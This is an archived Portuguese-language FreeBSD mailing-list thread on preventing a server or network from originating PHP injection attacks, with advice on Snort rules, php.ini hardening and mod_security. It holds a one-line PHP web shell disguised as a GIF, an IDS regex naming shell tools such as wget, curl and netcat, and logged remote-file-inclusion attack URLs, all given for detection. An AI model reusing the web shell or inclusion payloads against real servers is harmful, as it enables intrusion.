 realidade não conheço solução voltada para isso... existe o mod_security

A solução é o IPS/IDs hehe ;)

O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela 
quer. O mod_security é o mais indicado pra proteger exclusivamente o 
Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto 
sequer, é capaz de identificar padrões iniciados da maquina com 
mod_security para outros destinos. Apenas quando o destino final é o 
Apache (serviço httpd).

do
 apache que pode te ajudar a monitorar e filtrar suas aplicações.
 
 Penso em algum programa que cheque a integridade de arquivos no servidor,
 algo parecido com o file:
 
 [EMAIL PROTECTED]:~$ cat sh.gif
 ?php
 system($_GET['sh']);
 ?
 [EMAIL PROTECTED]:~$ file sh.gif
 sh.gif: PHP script text
 
 e depois, habilitar alguns filtros no mod_security buscando checar qualquer
 uso indevido do php... confesso que não conheço muito o mod_security, uma
 vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar
 um tempo para brincar com ele).
 
 Acredito que no mais é realizar auditorias... procurar nos logs do apache
 por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não
 resolva!

Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser 
pro-ativa.

E pelo que entendi na situação da Cristina ela não terá logs do Apache 
ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes 
de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos).

 
 Espero ter ajudado, boa sorte!
 
 
 Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
 Oi Patrick,

 Não sei se entendi muito bem, poderia me dar uma luz?
 Php injection, como próprio nome ja diz é a inserção de codigo php
 causado por código mal escrito que permito o injeção de código php
 externo no servidor, correto?

 Como que funcionam essas regras que você falou? Essas empresas liberam
 regras que atuam (obviamente) na camada do HTTP e analizam o
 trafego para os softwares vulneraveis que eles tem conhecimento e
 inclusao direta de scripts em servidores externos?

 Vlw

 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:

 Cristina Fernandes Silva escreveu:

 É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
   ? ou somente as regras que posso usar no snort.

  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
  precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
  não importa se é uma multinacional, pagara como pequeno. No site da
  SourceFire tem todos os detalhes sobre preços.

  São só as regras a principio, mas pode comprar o sistema deles. Não
  conheço quem use no país o sistema deles. Mas não parece ser mais do
 que
  o Snort com um front-end muito amigável.

  No caso da Juniper tem direito automaticamente a versão convertida pra
  Snort todos que tem Juniper série 5000 e já pague a licença anual do
 IPS
  (que é um add-on no firewall Juniper).

  No Brasil quem representa a venda das assinaturas Source Fire é a
  BRConnection.



  
  
  
   Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED]
 escreveu:
   Cristina Fernandes Silva escreveu:
  
   Acho que não fui clara, Vou explicar,

 Quero evitar que alguem da minha rede use o meu ip  (endereço )
 para
 fazer ataques
 de php injection para outro endereço externo. Até mesmo os meus
 usuarios interno fazer algum ataque para servidores externos..
  
  
   Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível
 de
satisfação vai depender da qualidade das regras de análise de
 instrusão
que você utilizar. Isso quer dizer que dependendo do nível de
 seriedade
da empresa será proveitoso assinar um serviço (comercial) que
 oferece
regras testadas e atualizadas. Apesar da escolha natural ser Source
Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas
 pela
Juniper. São as mesmas utilizadas no Juniper série 5000,
 convertidas pro
Snort.
  
   -
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
  
   -
   Histórico: http://www.fug.com.br/historico/html/freebsd/
   Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

  -
  Histórico: 

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico mantunes
Welkson,

Eu ia dizer a mesma coisa.. tentar usar o squidguard ou dansguardian,
não se se resolveria.. ai é que os amigos para analise..  e possíveis
regras..

Em 22/02/08, Welkson Renny de Medeiros[EMAIL PROTECTED] escreveu:
 Bom dia Cristina!


  Só respondendo a William: ela quer evitar que os usuários da rede dela façam
  ataque de sql injection usando o servidor dela...

  O IDS como Patrick falou seria uma boa solução...

  Uma outra que pensei... um filtro web também não ajudaria? tipo: um bloqueio
  via squid ou dansguardian nas strings select, where, delete from... isso
  teria que ser bastante analisado para não gerar falsos alertas... mas é uma
  possibilidade.

  O que acham?

  Abraço,


  --
  Welkson Renny de Medeiros
  Focus Automação Comercial
  Desenvolvimento / Gerência de Redes
  [EMAIL PROTECTED]



   Powered by 

(__)
 \\\'',)
   \/  \ ^
   .\._/_)

   www.FreeBSD.org


  - Original Message -
  From: Cristina Fernandes Silva [EMAIL PROTECTED]
  To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR)
  freebsd@fug.com.br

 Sent: Friday, February 22, 2008 11:23 AM
  Subject: Re: [FUG-BR] OT-Ataque PHP injection


  Olha pessoal é como evitar prover ataques originados do meu servidor.

  Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu:
  
opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o
banner do apache e do SO tbm... :)
  
  
  
-- Original Message ---
From: Marcelo M. Fleury [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR)
   freebsd@fug.com.br
  
   Sent: Fri, 22 Feb 2008 11:10:56 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection
  
 Bom,

 a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom
   esclarecer
 isso, a maioria das respostas é como evitar os ataques, mas eu
 entendi que ela quer garantir que em seu servidor não tenha códigos
 maliciosos, capazes de prover ataques em OUTROS servidores e não no
   dela...

 Gustavo, acrescentaria na sua lista o magic_quotes_gpc de
 qualquer formar, acredito que todas devem ser analisadas, buscando
 mensurar o impacto nos sistemas existentes...

 com relação a alterar a extensão do php, não sei até que ponto isso é
 valido... teria que se alterar o banner do apache também, dentre outras
 coisas( eu acho )... ataques de footprint são cada vez mais
   sofisticados...

 []s

 Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu:
 
 
  no php.ini vc pode fazer :
 
  disable_functions = system,exec
 
  isso fara com que o php nao execute as funcoes system() e nem
   exec()..
  dando
  maior seguranca a ataques desse tipo.. outras variaveis interessantes
   para
  prover maior seguranca no php sao:
 
  safe_mode= On
  safe_mode_gid=Off
  expose_php=Off
  register_globals=Off (sem comentarios.. rsrs)
  dispaly_error=Off
  log_eroor=On
  error_log=php_erro.log
 
  Considerando que seu php nao emitira erros, vale ainda configurar o
  apache:
 
  trocar :
  AddType application/x-httpd-php .php
 
  Por:
  AddType application/x-httpd-php .jsp
 
  Ou
  AddType application/x-httpd-php .dhmtl
 
  Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
  dificultara ao atacante qual a tecnologia que vc esta usando.. ele
   pensara
  que
  é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc
   deixar
  a
  variavel display_error=On, qdo der um erro.. o cara ja vai saber o
   que vc
  sta
  usando..
 
  isso ajuda mas nao evita ataques contra programacao mal feita!!
 
  modsecurity do apache é muito bom... acho que todos deveriam ter...
   com
  bons
  filtros.. ajuda muuuito!!
 
  ate.
 
  Gustavo Polillo Correa.
 
 
 
 
 
  -- Original Message ---
  From: Marcelo M. Fleury [EMAIL PROTECTED]
  To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
  freebsd@fug.com.br
  Sent: Fri, 22 Feb 2008 09:59:32 -0300
  Subject: Re: [FUG-BR] OT-Ataque PHP injection
 
   Olá,
  
   até onde eu entendi, o interesse da Cristina é em não ser uma
   provedora de códigos maliciosos, no caso PHP.
  
   Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
  ataques
   a rede/host, e sim de que a rede ou host seja uma provedora de
   ataques... na realidade não conheço solução voltada para isso...
   existe o mod_security do apache que pode te ajudar a monitorar e
   filtrar suas aplicações

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Patrick Tracanelli
William Grzybowski escreveu:
 Oi Patrick,

Buenos =)

 
 Não sei se entendi muito bem, poderia me dar uma luz?
 Php injection, como próprio nome ja diz é a inserção de codigo php
 causado por código mal escrito que permito o injeção de código php
 externo no servidor, correto?

Opa, confere hehehe

 
 Como que funcionam essas regras que você falou? Essas empresas liberam
 regras que atuam (obviamente) na camada do HTTP e analizam o
 trafego para os softwares vulneraveis que eles tem conhecimento e
 inclusao direta de scripts em servidores externos?

Cara, um IDS atua na camada 7, portanto de aplicação, seja qual 
aplicação for. Pense então numa regra ridiculamente simples, que alerte:

- qualquer fluxo de qualquer origem pra qualquer destino em portas HTTP 
conhecidas (80, 8080, 3128, etc)
- que cumpra os requisitos acima e contenha no payload um GET  
(protocolo HTTP) com qualquer uma das expressoes:
- qqcoisa.php?qqcoisa=(http|ftp)
- qqcoisa.php?qqcoisaqqcoisa=(http|ftp)

So a regra simplista acima daria match em coisas como

seila.php?ver=http://sei.na.net/seila2.php.txt
seila.php?ver=produtoscategoria=ftp://u:[EMAIL PROTECTED]/seila.txt

Ou seja ja eh indicio pleno de injection.

Adicione na verificacao se houver na URL (a partedo payload apos o GET 
na porta http) qualquer coisa entre:

(\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl
 
|python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks 
|id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec 
|smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ 
|\\./|whoami|killall |rm \\-[a-z|A-Z]))

Ai ja nem eh mais indicio, é descaramento.

Por exemplo, meu IPS acaba de pegar, nesse segundo, a seguinte tentativa:

GET 
http://www.freebsdbrasil.com.br/home.php?area=http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id;

E 10 segundos antes:

Req: http://free.bsd.com.br
GET 
//admin_users.php?phpbb_root_path=http://www.artsconnect.com.au/art/can? 
HTTP/1.1 405 345 (null) - libwww-perl/5.805 [EMAIL PROTECTED]

Qual é mais discarado? hhehehe se voce entrar em

http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id

Ta la o codigo que, supostamente, deveria ser injetado no php da vitima 
(eu).

A questão é, esses logs são de fluxo inbound, o que chega no meu IPS e 
vai pra dentro, mas se o fluxo fosse outbound eu pegaria exatamente a 
mesma coisa, pq o que passa no PAYLOAD é a mesma coisa, e é o que o 
IDS/IPS analisa. Então se alguem aqui, ou um servidor de cliente no Data 
Center for comprometido (ou o proprio cliente resolver brincar) e 
tentar realizar os probing partindo daqui de dentro os alertas gerados 
serao equivalentes.

Espero ter ajudado :)


 
 Vlw
 
 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
 Cristina Fernandes Silva escreveu:

 É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
   ? ou somente as regras que posso usar no snort.

  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
  precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
  não importa se é uma multinacional, pagara como pequeno. No site da
  SourceFire tem todos os detalhes sobre preços.

  São só as regras a principio, mas pode comprar o sistema deles. Não
  conheço quem use no país o sistema deles. Mas não parece ser mais do que
  o Snort com um front-end muito amigável.

  No caso da Juniper tem direito automaticamente a versão convertida pra
  Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS
  (que é um add-on no firewall Juniper).

  No Brasil quem representa a venda das assinaturas Source Fire é a
  BRConnection.



  
  
  
   Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu:
   Cristina Fernandes Silva escreveu:
  
   Acho que não fui clara, Vou explicar,

 Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
 fazer ataques
 de php injection para outro endereço externo. Até mesmo os meus
 usuarios interno fazer algum ataque para servidores externos..
  
  
   Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de
satisfação vai depender da qualidade das regras de análise de instrusão
que você utilizar. Isso quer dizer que dependendo do nível de seriedade
da empresa será proveitoso assinar um serviço (comercial) que oferece
regras testadas e atualizadas. Apesar da escolha natural ser Source
Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela
Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro
Snort.
  
   -
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
  
   -
   Histórico: 

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Patrick Tracanelli
Patrick Tracanelli escreveu:
 Marcelo M. Fleury escreveu:
 Olá,

 até onde eu entendi, o interesse da Cristina é em não ser uma provedora de
 códigos maliciosos, no caso PHP.
 
 Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios 
 internos façam ataque de injection em qualquer q seja o destino/alvo.

Ou melhor, *não* façam.

 
 Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
 a rede/host, e sim de que a rede ou host seja uma provedora de ataques...
 
 E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 
 fluxos, o que sai e o que entra na/da rede. Ainda não entendi a 
 relutancia hehe.
 
   na
 realidade não conheço solução voltada para isso... existe o mod_security
 
 A solução é o IPS/IDs hehe ;)
 
 O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela 
 quer. O mod_security é o mais indicado pra proteger exclusivamente o 
 Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto 
 sequer, é capaz de identificar padrões iniciados da maquina com 
 mod_security para outros destinos. Apenas quando o destino final é o 
 Apache (serviço httpd).
 
 do
 apache que pode te ajudar a monitorar e filtrar suas aplicações.

 Penso em algum programa que cheque a integridade de arquivos no servidor,
 algo parecido com o file:

 [EMAIL PROTECTED]:~$ cat sh.gif
 ?php
 system($_GET['sh']);
 ?
 [EMAIL PROTECTED]:~$ file sh.gif
 sh.gif: PHP script text

 e depois, habilitar alguns filtros no mod_security buscando checar qualquer
 uso indevido do php... confesso que não conheço muito o mod_security, uma
 vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar
 um tempo para brincar com ele).

 Acredito que no mais é realizar auditorias... procurar nos logs do apache
 por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não
 resolva!
 
 Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser 
 pro-ativa.
 
 E pelo que entendi na situação da Cristina ela não terá logs do Apache 
 ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes 
 de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos).
 
 Espero ter ajudado, boa sorte!


 Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
 Oi Patrick,

 Não sei se entendi muito bem, poderia me dar uma luz?
 Php injection, como próprio nome ja diz é a inserção de codigo php
 causado por código mal escrito que permito o injeção de código php
 externo no servidor, correto?

 Como que funcionam essas regras que você falou? Essas empresas liberam
 regras que atuam (obviamente) na camada do HTTP e analizam o
 trafego para os softwares vulneraveis que eles tem conhecimento e
 inclusao direta de scripts em servidores externos?

 Vlw

 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:

 Cristina Fernandes Silva escreveu:

 É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
   ? ou somente as regras que posso usar no snort.

  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
  precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
  não importa se é uma multinacional, pagara como pequeno. No site da
  SourceFire tem todos os detalhes sobre preços.

  São só as regras a principio, mas pode comprar o sistema deles. Não
  conheço quem use no país o sistema deles. Mas não parece ser mais do
 que
  o Snort com um front-end muito amigável.

  No caso da Juniper tem direito automaticamente a versão convertida pra
  Snort todos que tem Juniper série 5000 e já pague a licença anual do
 IPS
  (que é um add-on no firewall Juniper).

  No Brasil quem representa a venda das assinaturas Source Fire é a
  BRConnection.



  
  
  
   Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED]
 escreveu:
   Cristina Fernandes Silva escreveu:
  
   Acho que não fui clara, Vou explicar,

 Quero evitar que alguem da minha rede use o meu ip  (endereço )
 para
 fazer ataques
 de php injection para outro endereço externo. Até mesmo os meus
 usuarios interno fazer algum ataque para servidores externos..
  
  
   Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível
 de
satisfação vai depender da qualidade das regras de análise de
 instrusão
que você utilizar. Isso quer dizer que dependendo do nível de
 seriedade
da empresa será proveitoso assinar um serviço (comercial) que
 oferece
regras testadas e atualizadas. Apesar da escolha natural ser Source
Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas
 pela
Juniper. São as mesmas utilizadas no Juniper série 5000,
 convertidas pro
Snort.
  
   -
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
  
   -
   Histórico: http://www.fug.com.br/historico/html/freebsd/
   Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

  

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Marcelo M. Fleury
Bom,
Patrick, você está certo :), obrigado pelo post explicativo, tanto tempo sem
mexer no snort ou em qualquer ids/ips, me fez confundir as bolas xD.

[]s
Em 22/02/08, Patrick Tracanelli [EMAIL PROTECTED] escreveu:

 Patrick Tracanelli escreveu:

  Marcelo M. Fleury escreveu:
  Olá,
 
  até onde eu entendi, o interesse da Cristina é em não ser uma provedora
 de
  códigos maliciosos, no caso PHP.
 
  Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios
  internos façam ataque de injection em qualquer q seja o destino/alvo.


 Ou melhor, *não* façam.


 
  Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
 ataques
  a rede/host, e sim de que a rede ou host seja uma provedora de
 ataques...
 
  E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2
  fluxos, o que sai e o que entra na/da rede. Ainda não entendi a
  relutancia hehe.
 
na
  realidade não conheço solução voltada para isso... existe o
 mod_security
 
  A solução é o IPS/IDs hehe ;)
 
  O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela
  quer. O mod_security é o mais indicado pra proteger exclusivamente o
  Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto
  sequer, é capaz de identificar padrões iniciados da maquina com
  mod_security para outros destinos. Apenas quando o destino final é o
  Apache (serviço httpd).
 
  do
  apache que pode te ajudar a monitorar e filtrar suas aplicações.
 
  Penso em algum programa que cheque a integridade de arquivos no
 servidor,
  algo parecido com o file:
 
  [EMAIL PROTECTED]:~$ cat sh.gif
  ?php
  system($_GET['sh']);
  ?
  [EMAIL PROTECTED]:~$ file sh.gif
  sh.gif: PHP script text
 
  e depois, habilitar alguns filtros no mod_security buscando checar
 qualquer
  uso indevido do php... confesso que não conheço muito o mod_security,
 uma
  vez que não trampo mais como sysadmin e sim como desenvolvedor(quero
 arrumar
  um tempo para brincar com ele).
 
  Acredito que no mais é realizar auditorias... procurar nos logs do
 apache
  por qualquer comando... estilo uname, id, ls ... nada que o
 cat,grep,awk não
  resolva!
 
  Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser
  pro-ativa.
 
  E pelo que entendi na situação da Cristina ela não terá logs do Apache
  ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes
  de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos).
 
  Espero ter ajudado, boa sorte!
 
 
  Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
  Oi Patrick,
 
  Não sei se entendi muito bem, poderia me dar uma luz?
  Php injection, como próprio nome ja diz é a inserção de codigo php
  causado por código mal escrito que permito o injeção de código php
  externo no servidor, correto?
 
  Como que funcionam essas regras que você falou? Essas empresas liberam
  regras que atuam (obviamente) na camada do HTTP e analizam o
  trafego para os softwares vulneraveis que eles tem conhecimento e
  inclusao direta de scripts em servidores externos?
 
  Vlw
 
  2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
 
  Cristina Fernandes Silva escreveu:
 
  É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
 apllicance
? ou somente as regras que posso usar no snort.
 
   Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
   precos. Eles confiam no que voce diz: Se voce diz que é pequeno
 porte,
   não importa se é uma multinacional, pagara como pequeno. No site da
   SourceFire tem todos os detalhes sobre preços.
 
   São só as regras a principio, mas pode comprar o sistema deles. Não
   conheço quem use no país o sistema deles. Mas não parece ser mais do
  que
   o Snort com um front-end muito amigável.
 
   No caso da Juniper tem direito automaticamente a versão convertida
 pra
   Snort todos que tem Juniper série 5000 e já pague a licença anual do
  IPS
   (que é um add-on no firewall Juniper).
 
   No Brasil quem representa a venda das assinaturas Source Fire é a
   BRConnection.
 
 
 
   
   
   
Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED]
  escreveu:
Cristina Fernandes Silva escreveu:
   
Acho que não fui clara, Vou explicar,
 
  Quero evitar que alguem da minha rede use o meu ip  (endereço
 )
  para
  fazer ataques
  de php injection para outro endereço externo. Até mesmo os
 meus
  usuarios interno fazer algum ataque para servidores externos..
   
   
Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O
 nível
  de
 satisfação vai depender da qualidade das regras de análise de
  instrusão
 que você utilizar. Isso quer dizer que dependendo do nível de
  seriedade
 da empresa será proveitoso assinar um serviço (comercial) que
  oferece
 regras testadas e atualizadas. Apesar da escolha natural ser
 Source
 Fire, minha escolha pessoal (e sugestão) é pelas regras
 fornecidas
  pela
 Juniper. São as mesmas utilizadas no Juniper série 5000,
  

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico William Grzybowski
Boa tarde :)

2008/2/22 Patrick Tracanelli [EMAIL PROTECTED]:
 William Grzybowski escreveu:
   Oi Patrick,

  Buenos =)


  
   Não sei se entendi muito bem, poderia me dar uma luz?
   Php injection, como próprio nome ja diz é a inserção de codigo php
   causado por código mal escrito que permito o injeção de código php
   externo no servidor, correto?

  Opa, confere hehehe


  
   Como que funcionam essas regras que você falou? Essas empresas liberam
   regras que atuam (obviamente) na camada do HTTP e analizam o
   trafego para os softwares vulneraveis que eles tem conhecimento e
   inclusao direta de scripts em servidores externos?

  Cara, um IDS atua na camada 7, portanto de aplicação, seja qual
  aplicação for. Pense então numa regra ridiculamente simples, que alerte:

  - qualquer fluxo de qualquer origem pra qualquer destino em portas HTTP
  conhecidas (80, 8080, 3128, etc)
  - que cumpra os requisitos acima e contenha no payload um GET 
  (protocolo HTTP) com qualquer uma das expressoes:
 - qqcoisa.php?qqcoisa=(http|ftp)
 - qqcoisa.php?qqcoisaqqcoisa=(http|ftp)

  So a regra simplista acima daria match em coisas como

 seila.php?ver=http://sei.na.net/seila2.php.txt
 seila.php?ver=produtoscategoria=ftp://u:[EMAIL PROTECTED]/seila.txt

  Ou seja ja eh indicio pleno de injection.

  Adicione na verificacao se houver na URL (a partedo payload apos o GET
  na porta http) qualquer coisa entre:

  
 (\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl
  |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks
  |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec
  |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+
  |\\./|whoami|killall |rm \\-[a-z|A-Z]))

  Ai ja nem eh mais indicio, é descaramento.

  Por exemplo, meu IPS acaba de pegar, nesse segundo, a seguinte tentativa:

  GET
  
 http://www.freebsdbrasil.com.br/home.php?area=http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id;

  E 10 segundos antes:

  Req: http://free.bsd.com.br
  GET
  //admin_users.php?phpbb_root_path=http://www.artsconnect.com.au/art/can?
  HTTP/1.1 405 345 (null) - libwww-perl/5.805 [EMAIL PROTECTED]

  Qual é mais discarado? hhehehe se voce entrar em

  http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id

  Ta la o codigo que, supostamente, deveria ser injetado no php da vitima
  (eu).

  A questão é, esses logs são de fluxo inbound, o que chega no meu IPS e
  vai pra dentro, mas se o fluxo fosse outbound eu pegaria exatamente a
  mesma coisa, pq o que passa no PAYLOAD é a mesma coisa, e é o que o
  IDS/IPS analisa. Então se alguem aqui, ou um servidor de cliente no Data
  Center for comprometido (ou o proprio cliente resolver brincar) e
  tentar realizar os probing partindo daqui de dentro os alertas gerados
  serao equivalentes.

  Espero ter ajudado :)

Ajudou sim, ficou bem claro em como o IPS/IDS atuam :) obrigado.
E realmente, seria a solução ideal para o problema ;D





  
   Vlw
  
   2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
   Cristina Fernandes Silva escreveu:
  
   É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
 ? ou somente as regras que posso usar no snort.
  
Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
não importa se é uma multinacional, pagara como pequeno. No site da
SourceFire tem todos os detalhes sobre preços.
  
São só as regras a principio, mas pode comprar o sistema deles. Não
conheço quem use no país o sistema deles. Mas não parece ser mais do que
o Snort com um front-end muito amigável.
  
No caso da Juniper tem direito automaticamente a versão convertida pra
Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS
(que é um add-on no firewall Juniper).
  
No Brasil quem representa a venda das assinaturas Source Fire é a
BRConnection.
  
  
  



 Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu:
 Cristina Fernandes Silva escreveu:

 Acho que não fui clara, Vou explicar,
  
   Quero evitar que alguem da minha rede use o meu ip  (endereço ) 
 para
   fazer ataques
   de php injection para outro endereço externo. Até mesmo os meus
   usuarios interno fazer algum ataque para servidores externos..


 Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de
  satisfação vai depender da qualidade das regras de análise de 
 instrusão
  que você utilizar. Isso quer dizer que dependendo do nível de 
 seriedade
  da empresa será proveitoso assinar um serviço (comercial) que oferece
  regras testadas e atualizadas. Apesar da escolha natural ser Source
  Fire, minha escolha pessoal (e 

[FUG-BR] OT-Ataque PHP injection

2008-02-21 Por tôpico Cristina Fernandes Silva
Pessoal,

Existe alguma possibilidade evitar que um ataque de php injection
tenha origem do meu servidor  ou nada posso fazer ? onde tenho que
configurar.. apache ? regras de firewall, snort ou até mesmo php.ini

Alguem ja passou por essa situação ?



Obrigada
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-21 Por tôpico William Grzybowski
Oi devolta,

2008/2/21 Cristina Fernandes Silva [EMAIL PROTECTED]:
 Acho que não fui clara, Vou explicar,

  Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
  fazer ataques
  de php injection para outro endereço externo. Até mesmo os meus
  usuarios interno fazer algum ataque para servidores externos..

Acho que foi clara sim eu que nao li direito xD
Mas acho que a resposta acaba sendo quase a mesma, não se tem mto o
que fazer mesmo,
o ideal seria negar acesso shell e desabilitar o system(), exec() do
php pelo php.ini






  Em 21/02/08, William Grzybowski[EMAIL PROTECTED] escreveu:


  Oi,
  
  
On Thu, Feb 21, 2008 at 8:27 PM, Cristina Fernandes Silva
[EMAIL PROTECTED] wrote:
 Pessoal,

  Existe alguma possibilidade evitar que um ataque de php injection
  tenha origem do meu servidor  ou nada posso fazer ? onde tenho que
  configurar.. apache ? regras de firewall, snort ou até mesmo php.ini

  Alguem ja passou por essa situação ?
  
  
   O maximo que você pode fazer é ficar antenada nos bugs dos scripts que
você utiliza em seu servidor e mante-los sempre atualizados...
Esses ataques são feitos diretamente no php injetando codigo malicioso
através da query string.
PS: É importante desabilitar o uso de execução de linhas de comando de
sistema do php (system() exec() ) no php.ini caso você não utilize
  



  Obrigada
  -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

  
  
  
  
--
William Grzybowski
--
Jabber: william88 at gmail dot com
Curitiba/PR - Brazil
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
  
  -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
William Grzybowski
--
Jabber: william88 at gmail dot com
Curitiba/PR - Brazil
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-21 Por tôpico Patrick Tracanelli
Cristina Fernandes Silva escreveu:
 Acho que não fui clara, Vou explicar,
 
 Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
 fazer ataques
 de php injection para outro endereço externo. Até mesmo os meus
 usuarios interno fazer algum ataque para servidores externos..

Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de 
satisfação vai depender da qualidade das regras de análise de instrusão 
que você utilizar. Isso quer dizer que dependendo do nível de seriedade 
da empresa será proveitoso assinar um serviço (comercial) que oferece 
regras testadas e atualizadas. Apesar da escolha natural ser Source 
Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela 
Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro 
Snort.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
